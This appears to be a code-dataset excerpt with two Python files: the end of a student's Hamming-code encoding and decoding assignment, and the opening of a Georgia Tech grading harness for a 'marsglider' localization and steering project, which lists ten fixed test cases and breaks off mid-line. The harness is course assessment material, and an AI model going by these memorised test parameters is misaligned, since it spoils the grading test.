'1':#convert any number that is not 1 or 0 to a 1 or 0 dependent on the number\n times = int(bin(times)[-1]) #take the last digit of the binary number, 0 representing odd, 1 representing even\n calc_vector.append(times) #add the number to the output variable\n times = 0\n if count == len(G[0]): #determine when the multiplicaiton is complete\n break\n return calc_vector\n\n\ndef MatrixGridPrint(G):\n for vector in G:\n row = []\n for digit in vector:\n row.append(str(digit))\n print(''.join(row))\n\n\ndef VectorAddition(v1,v2):\n ans = [] #setup a list for the output vector\n for i in range(len(v1)):\n add = v1[i] + v2[i] #add the respective numebers to each other\n if str(add) not in '0' and str(add) not in '1':#convert value which are 0 or 1\n add = int(bin(add)[-1]) #take the last digit of the binary of that number\n ans.append(add) #add the number to the output vector\n return ans\n \n\ndef hammingGeneratorMatrix(r):\n n = 2**r-1\n pi = [] #construct permutation pi\n for i in range(r):\n pi.append(2**(r-i-1))\n for j in range(1,r):\n for k in range(2**j+1,2**(j+1)):\n pi.append(k)\n rho = [] #construct rho = pi^(-1)\n for i in range(n):\n rho.append(pi.index(i+1))\n global H\n H = [] #construct H'\n for i in range(r,n):\n H.append(decimalToVector(pi[i],r))\n GG = [list(i) for i in zip(*H)] #construct G'\n for i in range(n-r):\n GG.append(decimalToVector(2**(n-r-i-1),n-r))\n G = [] #apply rho to get Gtranspose\n for i in range(n):\n G.append(GG[rho[i]])\n G = [list(i) for i in zip(*G)] #transpose\n return G\n\n\ndef repetitionEncoder(m,n):\n rep_code = [] #create list for output vector\n for i in range(n): #number of element to be added\n rep_code.append(m) #add the correct number of the correct element\n print('The encoded version is',rep_code)\n\n\ndef repetitionDecoder(v):\n if v.count(0) > v.count(1): #check to see if number of 0's > number of 1's\n print(0)\n elif v.count(1) > v.count(0): #check to see if number of 1's > number of 0's\n print(1)\n else:\n print('Decoder failure: no unique nearest codeword.')\n\n\ndef hammingEncoder(m):\n r = 2 #set the minimum value of r\n k = len(m) #set the variable k equal to length of input vector\n while r in range(11):\n if r >= 10:\n print('Error: incorrect length')\n break\n elif 2**r - r - 1 == k: #test values of r to see if equal to k\n encoded = vectorTimesMatrix(m,hammingGeneratorMatrix(r))#multiply the vector by the correct generator matrix\n return encoded\n break\n else:\n r+=1 #increment r in order to try another value\n\n\n\n\ndef hammingBruteForce(v):\n r = 2 #r >= 2 \n while r in range(2,10): #Begin ascertaining a value of r\n k = 2**r - r -1 #calculate a value of k from the value of r generated\n test_vector = [0]*k #setup a test vector for vectorTimesMatrix\n new_vector = vectorTimesMatrix(test_vector,hammingGeneratorMatrix(r))#multiply the test vector for that value of r by the hammingGeneratorMatrix for that value of r\n if r == 9:\n print('Error: incorrect length')\n break\n elif len(new_vector) == len(v): #value of r is found if length of new vector the same as length of input vector, v\n j = 2**(len(v)-r) #calculate the max number of m values\n n = len(v) - r #calcualte the max number of bits needed for decimalToVector in order to generate all the numbers in range(0,m)\n i,u = 0,0 #create variable for the number decimalToVector and print counter\n while i in range(0,j):\n B = decimalToVector(i,n) #convert the decimal to a vector with the correct number of bits\n m = vectorTimesMatrix(B,hammingGeneratorMatrix(r))#multiply the number by the correct generator matrix as found earlier\n print('m' + str(u) + ' = ' +str(m))\n print('d(v, m' + str(u)+') = ' + str(Hamming_Distance(v,m)))\n u+=1 #increment the printing counter\n if Hamming_Distance(v,m) <= 1: #check the hamming distance between the original vector and the output vector\n return m\n print('c =',m) #print coddeword if dH = 1\n break\n else:\n i+=1 #increment the number decimalToVector will generate\n break \n else:\n r+=1 #increment the value of r that is being tested\n\n\n\ndef HammingTranspose(m):\n HTranspose = [list(i) for i in zip(*m)]\n return HTranspose\n\n\n\ndef ParityCheckMatrix(r):\n pcm_setup = [] #create variable for the output matrix\n for i in range(1,2**r): #calculate the range of numbers to be generated \n new_vector = []\n new_vector = decimalToVector(i,r) #convert the numbers to binary with the correct number of bits based on r\n pcm_setup.append(new_vector) #add the numbers to the output matrix\n pcm = HammingTranspose(pcm_setup) #transpose the matrix to the correct format\n return pcm\n\n\n\ndef hammingLocalSearch(v):\n r = 2\n while r in range(2,10): #Begin ascertaining a value of r\n k = 2**r - r -1 #calculate a value of k from the value of r generated\n test_vector = [0]*k #setup a test vector for vectorTimesMatrix\n new_vector = vectorTimesMatrix(test_vector,hammingGeneratorMatrix(r))#multiply the test vector for that value of r by the hammingGeneratorMatrix for that value of r\n if r == 9:\n print('Error: incorrect length')\n break\n elif len(new_vector) == len(v): #value of r is found if length of new vector the same as length of input vector, v\n i = 0 #create a count variable for the position in e list which is equal to 1\n e = [0]*len(v) #set up a list of 0's with length equal to input vector\n en = 1 #counter for when printing v + e[en] = ...\n new_vector = VectorAddition(v,e) #add 1 to a position of the original vector \n while i in range(len(e)+1):\n vHt = vectorTimesMatrix(new_vector,HammingTranspose(ParityCheckMatrix(r)))#calculate vHt\n if len(v) != len(HammingTranspose(ParityCheckMatrix(r))):\n print('Error: incorrect length')\n break\n elif vHt == [0]*r: #check to see if the correct vHt has been outputted, hence the codeword is found\n return new_vector\n print('Syndrome =',vHt)\n print('c =',new_vector)\n break\n else:\n print('Syndrome =',vHt)\n e = [0]*len(v) #reset list e to its original state\n e[i] = 1 #add one to the position relating to i\n new_vector = VectorAddition(v,e)#add the new list e with 1 in a different position to the original vector\n print('v + e' + str(en) + ' = ' + str(new_vector))\n i+=1 #increment the position in the list e which is assigned to 1\n en+=1 #increment the printing counter\n break\n else:\n r+=1 #increment the value of r that is being tested\n\n\ndef hammingSyndrome(v):\n r = 2\n while r in range(2,10): #Begin ascertaining a value of r\n k = 2**r - r -1 #calculate a value of k from the value of r generated\n test_vector = [0]*k #setup a test vector for vectorTimesMatrix\n new_vector = vectorTimesMatrix(test_vector,hammingGeneratorMatrix(r))#multiply the test vector for that value of r by the hammingGeneratorMatrix for that value of r\n if r == 9:\n print('Error: incorrect length')\n break\n elif len(new_vector) == len(v): #value of r is found if length of new vector the same as length of input vector, v\n e = [0]*len(v) #set up a list of 0's with length equal to input vector\n vHt = vectorTimesMatrix(v,HammingTranspose(ParityCheckMatrix(r)))#calculate vHt\n if vHt == [0]*r: #check to see if the correct vHt has been outputted, hence the codeword is found\n return v\n print('c =',v)\n break\n elif len(v) != len(HammingTranspose(ParityCheckMatrix(r))):\n print('Error: incorrect length')\n else:\n print('Syndrome =',vHt)\n digits = [] #turn the list of the vector input into a string\n for digit in vHt:\n digits.append(str(digit))\n i = int(''.join(digits),2) #convert from binary to decimal in order to calculate the correct position for 1 to be added to\n #print('The position for the 1 to be added is',str(i))\n e[i-1] = 1 #convert the correct position to a 1\n new_vector = VectorAddition(v,e) #add the e list to the original vector\n return new_vector\n print('c =',new_vector)\n break\n else:\n r+=1 #increment the value of r that is being tested\n\n\ndef hammingRecover(c):\n message = [] #create a variable for the output message\n for i in range(1,len(c)+1):\n if (math.log(i,2))%1 != 0: #check if the position number is a power of 2\n message.append(c[i-1]) #if not a power of 2, add to the output message\n return message\n print(message)\n\n\ndef BSC(p,c):\n for i in range(len(c)):\n number = random.random() #generate random number between 0 and 1\n if number < p: #check if number is less than specified value of p\n if c[i] == 1: #flip bit from 1 to 0\n c[i] = 0\n elif c[i] == 0: #flip bit from 0 to 1\n c[i] = 1\n else:\n c[i] = c[i] #keep the bit the same\n return c\n print(c)\n\n\n\ndef hammingDEP(p,r): \n n = 2**r - 1 #calculate a value of n from r\n dep = 1 - ((1-p)**n) - (n*p)*(1-p)**(n-1) #calculate the value for DEP using probabalistic formula\n print('Theoretical DEP =',str(round(dep,2))) #print the number rounded to 2dp\n\n\n#def repetitionDEP(p,n):\n \n\ndef hammingSimulation(T,p,r):\n s = 0 #set up a variable for the number of simulations completed\n sim_number = 1 #set up a variable for the simulation counter\n success = 0 #set up a variable to count the number of decode successes\n while s < T:\n print('\\n' + 'Simulation ' + str(sim_number) + '\\n')#print the simulation number\n k = 2**r - r - 1 #calculate a value for length of random message based on r\n message = [] #set up a variable for this random message\n for i in range(k):\n message.append(randint(0,1)) #generate the random message \n print('Message m =',message)\n encoded = hammingEncoder(message) #hamming encode the message\n print('Codeword c =',encoded)\n bsc = BSC(p,encoded) #send it the encoded message through the BSC\n print('Received v =',bsc)\n v = hammingSyndrome(bsc) #decode the output of the BSC\n print('Decoded hatc =',v)\n message_recover = hammingRecover(v) #recover the original message from the decoder output\n print('Retrieved hatm =',message_recover)\n if message_recover == message: #check to see if the decode was a success i.e. original message is the output message\n print('Decoder success')\n success+=1 #increment the success counter\n else:\n print('Decoder error') \n s+=1 #increment the simulation number\n sim_number+=1 #increment the simulation print counter number\n experimentalDEP = success/T #calculate the experimental value of DEP\n print('\\n' + 'Experimental DEP = ' + str(experimentalDEP) + '\\n')\n hammingDEP(p,r) #calculate the theoretical value of DEP \n\n\nhammingSimulation(2,0.1,3)\n\n\n#def repetitionSimulation(T,p,n):\n \n \n \n\n\n\n\n\n\n\n\n\n#u = [1,0,1,1]\n#print('\\n')\n#v = [0,1,1,0,0,0,0]\n#print('\\n')\n#hammingEncoder([1,0,0,0])\n#print('\\n')\n#hammingEncoder([1,1,1,0,0,0,0])\n#print('\\n')\n#hammingBruteForce(u)\n#print('\\n')\n#hammingBruteForce(v)\n#print('\\n')\n#hammingLocalSearch(u)\n#print('\\n')\n#hammingLocalSearch(v)\n#print('\\n')\n#hammingSyndrome(u)\n#print('\\n')\n#hammingSyndrome(v)\n \n\n\n \n\n\n \n\n\n\n","sub_path":"Eddies-Code/Python/Summative/ErroCorrecting/ErrorCorrectingV1.18Notes.py","file_name":"ErrorCorrectingV1.18Notes.py","file_ext":"py","file_size_in_byte":18010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"609491824","text":"from __future__ import division\nfrom __future__ import print_function\nfrom builtins import zip\nfrom builtins import range\nfrom builtins import object\nfrom past.utils import old_div\n######################################################################\n# This file copyright the Georgia Institute of Technology\n#\n# Permission is given to students to use or modify this file (only)\n# to work on their assignments.\n#\n# You may NOT publish this file or make it available to others not in\n# the course.\n#\n######################################################################\n\n#!/usr/bin/python\n\nimport math\nimport random\nimport unittest\nimport glider\nimport multiprocessing as mproc\nimport queue\nimport traceback\nfrom opensimplex import OpenSimplex\n\n\nTIME_LIMIT = 10 # seconds - Note, if you turn on Verbose Logging \n # or Plotting of Particles, you will want to increase this\n # number from the 10 used in grading to a much higher value.\n\t\t # If you have a fast computer, you may want to reduce this \n\t # number to match your computer's speed to that of the \n # VM used by GradeScope\n\nVERBOSE = False # False for grading \nPLOT_PARTICLES = False # False for grading (Set to True for Vizualization!)\nPLOT_MAP = False # False for grading (True for map coloring in part A )\n\t\t # (Note: PLOT_MAP requires PLOT_PARTICLES Vizualization!)\nPART_A = True # Enable/disable Part A (Estimation) - True for grading\nPART_B = True # Enable/disable Part B (Steering) - True for grading\n\n########################################################################\n# If your debugger does not handle multiprocess debugging very easily\n# then when debugging set the following flag true.\n########################################################################\nDEBUGGING_SINGLE_PROCESS = False\n\nWINDOW_SIZE = 400 #Size of the window in \"units\" (actually 2x this...)\n\n\n#Note for Mac OS High Sierra users having problems with \"an error occurred while attempting to obtain endpoint for listener\" errors:\n#Running with the following environment variable fixed this issue for one student. \n#OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES\n#Looks like a problem specific to Mac OS High Sierra and internal threading libraries.\n\nPI = math.pi\nCREDIT_PER_PASS = 7 # points per test case pass.\n\n#10 test cases, ran in both parts A & B for 20 total.\n# Max score if you get all test cases is potentially 140, but capped at 101 \n# This means you do not need to get all test cases for a full score.\n\n\n# The real test cases will be generated using generate_parms_marsglidder.py \n# You are welcome to make your own test cases\n# and share them on Piazza to expose issues that these test cases may miss.\n#\n#\n\n\nGLOBAL_PARAMETERS = [None,\n\n\t\t #Case 1 has no noise to make things easy for you!\n {'test_case': 1,\n 'target_x': 39.84595717195,\n 'target_y': -13.82584680823,\n 'target_heading': 1.335,\n 'map_seed': 1,\n 'map_freq': 4.0,\n 'measurement_noise': 0.0,\n 'turning_noise': 0.0,\n 'max_steps': 4500 },\n\n\n\n #Case 2 has no measurement noise, so hopefully you can \n #locate the glider, even with turning noise.\n \n #\n {'test_case': 2,\n 'target_x': 199.95,\n 'target_y': -199.23,\n 'target_heading': -0.75598927002,\n 'map_seed': 2,\n 'map_freq': 4.0,\n 'measurement_noise': 0.0,\n 'turning_noise': 0.01,\n 'max_steps': 4500 },\n\n\n #Case 3 has only measurement noise, and no turning noise!\n {'test_case': 3,\n 'target_x': -99.6,\n 'target_y': 199.23,\n 'target_heading': 0.598927002,\n 'map_seed': 2,\n 'map_freq': 2.0,\n 'measurement_noise': 0.1,\n 'turning_noise': 0.0,\n 'max_steps': 4500 },\n\n\t #Case 4 has both measurement AND (more) turning noise!\n {'test_case': 4,\n 'target_x': 242.8,\n 'target_y': 139.450053,\n 'target_heading': -0.65272,\n 'map_seed': 1,\n 'map_freq': 2.0,\n 'measurement_noise': 0.1,\n 'turning_noise': 0.050,\n 'max_steps': 4500 },\n\n\t\t #Case 5 has no noise\n # note that the heading is on the extreme end of\n # the random range for possible headings!\n {'test_case': 5,\n 'target_x': 19.84595717195,\n 'target_y': -23.82584680823,\n 'target_heading': 1.5703,\n 'map_seed': 5,\n 'map_freq': 3.0,\n 'measurement_noise': 0.0,\n 'turning_noise': 0.0,\n 'max_steps': 4500 },\n\n \n {'test_case': 6,\n 'target_x': 199.95,\n 'target_y': 166.0,\n 'target_heading': 0.1152,\n 'map_seed': 6,\n 'map_freq': 8.0,\n 'measurement_noise': 0.5,\n 'turning_noise': 0.02,\n 'max_steps': 4500 },\n\n\n {'test_case': 7,\n 'target_x': -99.6,\n 'target_y': 199.23,\n 'target_heading': 0.298927002,\n 'map_seed': 2,\n 'map_freq': 4.0,\n 'measurement_noise': 1.0,\n 'turning_noise': 0.05,\n 'max_steps': 4500 },\n\n {'test_case': 8,\n 'target_x': 232.8,\n 'target_y': 139.53,\n 'target_heading': -0.65272,\n 'map_seed': 3,\n 'map_freq': 2.0,\n 'measurement_noise': 4.0,\n 'turning_noise': 0.000,\n 'max_steps': 4500 },\n\n\n {'test_case': 9,\n 'target_x': 49.84595717195,\n 'target_y': -83.82584680823,\n 'target_heading': -0.340218,\n 'map_seed': 9,\n 'map_freq': 4.0,\n 'measurement_noise': 1.0,\n 'turning_noise': 0.00,\n 'max_steps': 4500 },\n\n {'test_case': 10,\n 'target_x': 19.84595717195,\n 'target_y': -23.82584680823,\n 'target_heading': -0.3703,\n 'map_seed': 5,\n 'map_freq': 4.0,\n 'measurement_noise': 0.50,\n 'turning_noise': 0.09,\n 'max_steps': 4500 },\n\n\n ]\n\n\n#Function that generates the map function....\ndef getMapFunc(Seed, Freq):\n #initialize OpenSimplex one time, use it many times.\n gen = OpenSimplex(Seed)\n\n def mapFunc(nx,ny):\n #Force 1 unit resolution by flooring nx,ny to nearest integer.\n nx = int(nx)\n ny = int(ny)\n nx = nx / 5000.0\n ny = ny / 5000.0\n\n #Generate noise from both low and high frequency noise:\n e0 = 1 * gen.noise2d(Freq * nx, Freq * ny)\n e1 = 0.5 * gen.noise2d(Freq*4*nx, Freq*4*ny)\n e2 = 0.25 * gen.noise2d(Freq*16*nx, Freq*16*ny)\n e = e0 + e1 + e2\n\n return e * 500 #500 meters above/below average...\n\n return mapFunc\n\ndef getMapColor( h, hmin, hmax ):\n cmin = 128\n cmax = 255\n color_scale = (cmax - cmin) / (hmax - hmin)\n h_clipped = max( min( h, hmax ), hmin )\n c = round( (h_clipped - hmin) * color_scale ) + cmin\n return (255, 127 + round(c * 0.5), c)\n\n#Try importing the student code here:\n\ntry:\n import marsglider \n marsglider1Exc=None\nexcept Exception as e:\n print(\"Error importing marsglider.py:\", e)\n marsglider1Exc=e\n\nclass GliderSimulator(object):\n \"\"\"Run student submission code.\n\n Attributes:\n glider_steps(Queue): synchronized queue to store glider steps.\n glider_found(Queue): synchronized queue to store if glider located.\n glider_error(Queue): synchronized queue to store exception messages.\n \"\"\"\n def __init__(self):\n\n if DEBUGGING_SINGLE_PROCESS:\n\n self.glider_steps = queue.Queue(1)\n self.glider_found = queue.Queue(1)\n self.glider_error = queue.Queue(1)\n\n else:\n\n self.glider_steps = mproc.Queue(1)\n self.glider_found = mproc.Queue(1)\n self.glider_error = mproc.Queue(1)\n\n def _reset(self):\n \"\"\"Reset submission results.\n \"\"\"\n while not self.glider_steps.empty():\n self.glider_steps.get()\n\n while not self.glider_found.empty():\n self.glider_found.get()\n\n while not self.glider_error.empty():\n self.glider_found.get()\n\n @staticmethod\n def distance(p, q):\n \"\"\"Calculate the distance between two points.\n\n Args:\n p(tuple): point 1.\n q(tuple): point 2.\n\n Returns:\n distance between points.\n \"\"\"\n x1, y1 = p[0],p[1]\n x2, y2 = q\n\n dx = x2 - x1\n dy = y2 - y1\n\n return math.sqrt(dx**2 + dy**2)\n\n @staticmethod\n def truncate_angle(t):\n \"\"\"Truncate angle between pi and -pi.\n\n Args:\n t(float): angle to truncate.\n\n Returns:\n truncated angle.\n \"\"\"\n return ((t + PI) % (2 * PI)) - PI\n\n def simulate_without_steering(self, estimate_next_pos, params):\n \"\"\"Run simulation only to locate glider.\n\n Args:\n estimate_next_pos(func): Student submission function to estimate next glider position.\n params(dict): Test parameters.\n\n Raises:\n Exception if error running submission.\n \"\"\"\n self._reset()\n\n #make the test somewhat repeatable by seeding the RNG.\n random.seed(params['map_seed'])\n\n ourMapFunc = getMapFunc( params['map_seed'], params['map_freq'])\n #Student function is separate, so they can mess it up if they want.\n studentMapFunc = getMapFunc( params['map_seed'], params['map_freq'] )\n\n target = glider.glider(params['target_x'],\n params['target_y'],\n 5000 + random.randint(-50,50), #Altitude\n params['target_heading'],\n ourMapFunc)\n target.set_noise(params['measurement_noise'],\n params['turning_noise'],\n 2.0 ) #Altitude (barameter) noise\n\n tolerance = 5.0 \n other_info = None\n steps = 0\n\n\n #Set up the particle plotter if requested\n if PLOT_PARTICLES == True:\n import turtle\t\t#Only import if plotting is on.\n X1,Y1,X2,Y2 = (-WINDOW_SIZE, -WINDOW_SIZE, WINDOW_SIZE, WINDOW_SIZE)\n turtle.setup(width=WINDOW_SIZE*2, height=WINDOW_SIZE*2) #800 pixels is screensize\n turtle.setworldcoordinates(X1,Y1, X2,Y2 )\n\n turtle.clearscreen()\n turtle.colormode(255)\n turtle.delay(0)\n turtle.hideturtle()\n turtle.penup()\n\n if PLOT_MAP:\n turtle.tracer(100000)\n\n bgturtle = turtle.Turtle()\n bgturtle.shape('square')\n bgturtle.speed(0)\n bgturtle.penup()\n for x in range(X1,X2,5):\n for y in range(Y1,Y2,5):\n bgturtle.goto(x,y)\n bgturtle.color( getMapColor( ourMapFunc(x,y), -500, 500 ) )\n bgturtle.stamp()\n\n turtle.tracer(1)\n\n turtleList = []\n target_turtle = None\n estimate_turtle = None\n\n try:\n while steps < params['max_steps']:\n target_meas = target.sense()\n target_height = target.get_height()\n\n result = estimate_next_pos(target_height,target_meas, studentMapFunc, other_info)\n\n if len(result) == 3:\n estimate, other_info,extra_points = result\n elif len(result) == 2: \n estimate, other_info = result\n extra_points = None\n else:\n print(\"estimate_next_pos did not return correct number of return values!\")\n\n\t\t#Calculate the actual position of the target next timestep.\n target = target.glide()\n target_pos = (target.x, target.y)\n\n if PLOT_PARTICLES == True and extra_points != None:\n\n #If the target goes outside the window coordinates,\n #recenter the window on the target.\n if target_pos[0] < X1 or target_pos[0] > X2 or target_pos[1] < Y1 or target_pos[1] > Y2:\n #calculate new bounding rectangle:\n X1 = target_pos[0] - WINDOW_SIZE \n X2 = X1 + 2000\n Y1 = target_pos[1] - WINDOW_SIZE \n Y2 = Y1 + 2000\n turtle.setworldcoordinates(X1,Y1, X2,Y2 )\n\n if PLOT_MAP:\n bgturtle.clear()\n turtle.tracer(100000)\n for x in range(round(X1),round(X2),20):\n for y in range(round(Y1),round(Y2),20):\n bgturtle.goto(x,y)\n bgturtle.color( getMapColor( ourMapFunc(x,y), -500, 500 ) )\n bgturtle.stamp()\n turtle.tracer(1)\n\n s = turtle.getscreen()\n s.tracer(0,1)\n\n # Add turtles if needed.\n while len(extra_points) > len(turtleList):\n newTurtle = turtle.Turtle()\n newTurtle.penup()\n turtleList.append(newTurtle)\n\n # remove turtles if needed.\n while len(extra_points) < len(turtleList):\n turtleList[-1].hideturtle()\n turtleList = turtleList[0:-1]\n\n for i in range(len(extra_points)):\n t = turtleList[i]\n p = extra_points[i]\n #Optionally plot heading if provided by student\n if len(p) > 2:\n t.shape(\"triangle\")\n t.shapesize(0.2,0.4)\n t.settiltangle( p[2] * 180 / math.pi )\n else:\n t.shape(\"circle\")\n t.shapesize(0.1,0.1)\n t.setposition(p[0],p[1])\n\n #Draw the actual glider.\n if target_turtle is not None:\n target_turtle.hideturtle()\n\n if target_turtle is None:\n target_turtle = turtle.Turtle()\n target_turtle.shape(\"triangle\")\n target_turtle.shapesize(0.2, 0.4)\n target_turtle.pencolor(\"red\")\n target_turtle.fillcolor(\"red\")\n target_turtle.penup()\n\n target_turtle.setposition(target_pos[0], target_pos[1])\n target_turtle.settiltangle( target.heading * 180 / math.pi )\n target_turtle.showturtle()\n\n #Draw the student estimate of the glider\n if estimate_turtle is not None:\n estimate_turtle.hideturtle()\n\n if estimate_turtle is None:\n estimate_turtle = turtle.Turtle()\n estimate_turtle.shape(\"circle\")\n estimate_turtle.shapesize(0.5,0.5)\n estimate_turtle.fill = False\n estimate_turtle.color(\"purple\")\n estimate_turtle.penup()\n\n estimate_turtle.setposition(estimate[0], estimate[1])\n estimate_turtle.showturtle()\n\n s.update()\n\n \n separation = self.distance(estimate, target_pos)\n if separation < tolerance:\n self.glider_found.put(True)\n self.glider_steps.put(steps)\n return\n\n steps += 1\n\n if VERBOSE == True:\n actual_height = target.z\n ground_height = ourMapFunc(target.x, target.y)\n actual_dist_to_ground = actual_height - ground_height \n print(\"\\nStep: {} Actual ({}) predicted: ({})\\n Difference = {}\\n Height={}, Ground Height = {} Dist To Ground = {}\".format( steps, target_pos, estimate, separation, actual_height, ground_height, actual_dist_to_ground)) \n if extra_points != None and len(extra_points) > 0:\n particle_dist = []\n for p in extra_points:\n dist = self.distance(p,target_pos)\n particle_dist.append(dist)\n pMin = min(particle_dist)\n pMax = max(particle_dist)\n pAvg = sum(particle_dist) / float( len(particle_dist))\n print(\"{} Particles, Min dist: {}, Avg dist: {}, Max Dist: {}\".format(len(extra_points), pMin, pAvg, pMax))\n\n\n self.glider_found.put(False)\n self.glider_steps.put(steps)\n\n except:\n self.glider_error.put(traceback.format_exc())\n\n def simulate_with_steering(self, next_angle, params):\n \"\"\"Run simulation to allow glider to be steered.\n\n Args:\n next_angle(func): Student submission function for gliders next turn angle.\n params(dict): Test parameters.\n\n Raises:\n Exception if error running submission.\n \"\"\"\n self._reset()\n \n #make the test somewhat repeatable by seeding the RNG.\n random.seed(params['map_seed'])\n\n ourMapFunc = getMapFunc( params['map_seed'], params['map_freq'])\n #Student function is separate, so they can mess it up if they want.\n studentMapFunc = getMapFunc( params['map_seed'], params['map_freq'] )\n\n target = glider.glider(params['target_x'],\n params['target_y'],\n 5000 + random.randint(-50,50), #Altitude\n params['target_heading'],\n ourMapFunc)\n target.set_noise(params['measurement_noise'],\n params['turning_noise'],\n 2.0 ) # Altitude (barometer) noise\n target_pos = (target.x, target.y)\n\n other_info = None\n steps = 0\n tolerance = 10.0\t#Double tolerance for steering task.\n\n # Set up the plotter if requested\n if PLOT_PARTICLES == True:\n import turtle\n X1,Y1,X2,Y2 = (-WINDOW_SIZE, -WINDOW_SIZE, WINDOW_SIZE, WINDOW_SIZE)\n s = turtle.getscreen()\n s.clearscreen()\n s.tracer(0,1)\n turtle.setup(width=WINDOW_SIZE*2,height=WINDOW_SIZE*2)\n turtle.setworldcoordinates(-WINDOW_SIZE,-WINDOW_SIZE,WINDOW_SIZE,WINDOW_SIZE)\n\n #If the target goes outside the window coordinates,\n #recenter the window on the target.\n if target_pos[0] < X1 or target_pos[0] > X2 or target_pos[1] < Y1 or target_pos[1] > Y2:\n #calculate new bounding rectangle:\n X1 = target_pos[0] - WINDOW_SIZE\n X2 = X1 + 2000\n Y1 = target_pos[1] - WINDOW_SIZE\n Y2 = Y1 + 2000\n turtle.setworldcoordinates(X1,Y1, X2,Y2 )\n\n #Draw a cross at (0,0)\n turtle.penup()\n turtle.setposition(0,-5)\n turtle.pendown()\n turtle.setposition(0,5)\n turtle.penup()\n turtle.setposition(-5,0)\n turtle.pendown()\n turtle.setposition(5,0)\n turtle.penup()\n\n # set starting point for glider trail\n turtle.setposition(target.x, target.y)\n turtle.pencolor(\"red\")\n turtle.pendown()\n turtle.ht()\n\n # create glider target turtle\n target_turtle = turtle.Turtle()\n target_turtle.penup()\n target_turtle.shape(\"triangle\")\n target_turtle.shapesize(0.2, 0.4)\n target_turtle.settiltangle(target.heading * 180 / math.pi )\n target_turtle.pencolor(\"red\")\n target_turtle.fillcolor(\"red\")\n target_turtle.setposition(target.x, target.y)\n\n turtleList = []\n\n try:\n while steps < params['max_steps']:\n target_meas = target.sense()\n target_height = target.get_height()\n result = next_angle(target_height, target_meas, studentMapFunc, other_info)\n if len(result) == 3:\n steering, other_info, extra_points = result\n elif len(result) == 2:\n steering, other_info = result\n extra_points = None\n else:\n print(\"next_angle did not return 2 or 3 return values!\")\n\n steering = max( -PI/8.0, steering)\n steering = min( steering, PI/8.0)\n\n target = target.glide(steering)\n\n target_pos = (target.x, target.y)\n separation = self.distance( (0,0) , target_pos)\n\n if PLOT_PARTICLES == True:\n\n if extra_points != None:\n #Add turtles if needed.\n while len(extra_points) > len(turtleList):\n newTurtle = turtle.Turtle()\n newTurtle.penup()\n turtleList.append( newTurtle )\n\n #remove turtles if needed.\n while len(extra_points) < len(turtleList):\n turtleList[-1].hideturtle()\n turtleList = turtleList[0:-1]\n\n # Draw the particles, set angle and position of each turtle.\n for i in range( len(extra_points)) :\n t = turtleList[i]\n p = extra_points[i]\n if len(p) > 2:\n t.shape(\"triangle\")\n t.shapesize(0.2, 0.4)\n t.settiltangle( p[2] * 180 / math.pi)\n else:\n t.shape(\"circle\")\n t.shapesize(0.1, 0.1)\n t.setposition(p[0],p[1])\n\n else: # remove previously displayed\n while 0 < len(turtleList):\n turtleList[-1].hideturtle()\n turtleList = turtleList[0:-1]\n\n # move glider target turtle and trail\n target_turtle.setposition(target.x, target.y)\n target_turtle.settiltangle(target.heading * 180 / math.pi)\n turtle.setposition(target.x, target.y)\n\n #Always show the actual glider on top.\n newFront = target_turtle.clone()\n target_turtle.ht()\n target_turtle = newFront\n\n s = turtle.getscreen()\n s.update()\n\n if VERBOSE == True:\n actual_height = target.z\n ground_height = ourMapFunc(target.x, target.y)\n actual_dist_to_ground = actual_height - ground_height\n print(\"Step: {} Actual Heading ({}) \\n Dist To (0,0) = {}\\n \".format(steps, target.heading, separation ))\n\n if separation < tolerance:\n self.glider_found.put(True)\n self.glider_steps.put(steps)\n return\n\n steps += 1\n\n self.glider_found.put(False)\n self.glider_steps.put(steps)\n\n except:\n self.glider_error.put(traceback.format_exc())\n\n\nNOT_FOUND = \"Part {} - Test Case {}: glider took {} step(s) which exceeded the {} allowable step(s).\"\n\n\nclass CaseRunner(unittest.TestCase):\n \"\"\"Run test case using specified parameters.\n\n Attributes:\n simulator(GliderSimulator): Simulation.\n \"\"\"\n @classmethod\n def setUpClass(cls):\n \"\"\"Setup test class.\n \"\"\"\n cls.simulator = GliderSimulator()\n\n def run_with_params(self, k, test_params, test_method, student_method):\n \"\"\"Run test case with parameters.\n\n Args:\n k(int): Test case global parameters.\n test_params(dict): Test parameters.\n test_method(func): Test function.\n student_method(func): Student submission function.\n \"\"\"\n test_params.update(GLOBAL_PARAMETERS[k])\n\n error_message = ''\n steps = None\n glider_found = False\n\n if DEBUGGING_SINGLE_PROCESS:\n test_method( student_method, test_params )\n else:\n test_process = mproc.Process(target=test_method, args=(student_method, test_params))\n\n try:\n test_process.start()\n test_process.join(TIME_LIMIT)\n except Exception as exp:\n error_message += str(exp) + ' '\n\n if test_process.is_alive():\n test_process.terminate()\n error_message = ('Test aborted due to CPU timeout. ' +\n 'Test was expected to finish in fewer than {} second(s).'.format(TIME_LIMIT))\n\n if not error_message:\n if not self.simulator.glider_error.empty():\n error_message += self.simulator.glider_error.get()\n\n if not self.simulator.glider_found.empty():\n glider_found = self.simulator.glider_found.get()\n\n if not self.simulator.glider_steps.empty():\n steps = self.simulator.glider_steps.get()\n\n self.assertFalse(error_message, error_message)\n self.assertTrue(glider_found, NOT_FOUND.format(test_params['part'],\n test_params['test_case'],\n steps,\n test_params['max_steps']))\n\n\n\nclass PartATestCase(CaseRunner):\n \"\"\"Test Part A (localization only, no steering)\n\n Attributes:\n test_method(func): Test function.\n student_method(func): Student submission function.\n params(dict): Test parameters.\n \"\"\"\n def setUp(self):\n \"\"\"Setup for each test case.\n \"\"\"\n\n if marsglider1Exc:\n raise marsglider1Exc\n\n self.test_method = self.simulator.simulate_without_steering\n self.student_method = marsglider.estimate_next_pos\n\n self.params = dict()\n self.params['part'] = 'A'\n\n def test_case01(self):\n self.run_with_params(1, self.params, self.test_method, self.student_method)\n\n def test_case02(self):\n self.run_with_params(2, self.params, self.test_method, self.student_method)\n\n def test_case03(self):\n self.run_with_params(3, self.params, self.test_method, self.student_method)\n\n def test_case04(self):\n self.run_with_params(4, self.params, self.test_method, self.student_method)\n\n def test_case05(self):\n self.run_with_params(5, self.params, self.test_method, self.student_method)\n\n def test_case06(self):\n self.run_with_params(6, self.params, self.test_method, self.student_method)\n\n def test_case07(self):\n self.run_with_params(7, self.params, self.test_method, self.student_method)\n\n def test_case08(self):\n self.run_with_params(8, self.params, self.test_method, self.student_method)\n\n def test_case09(self):\n self.run_with_params(9, self.params, self.test_method, 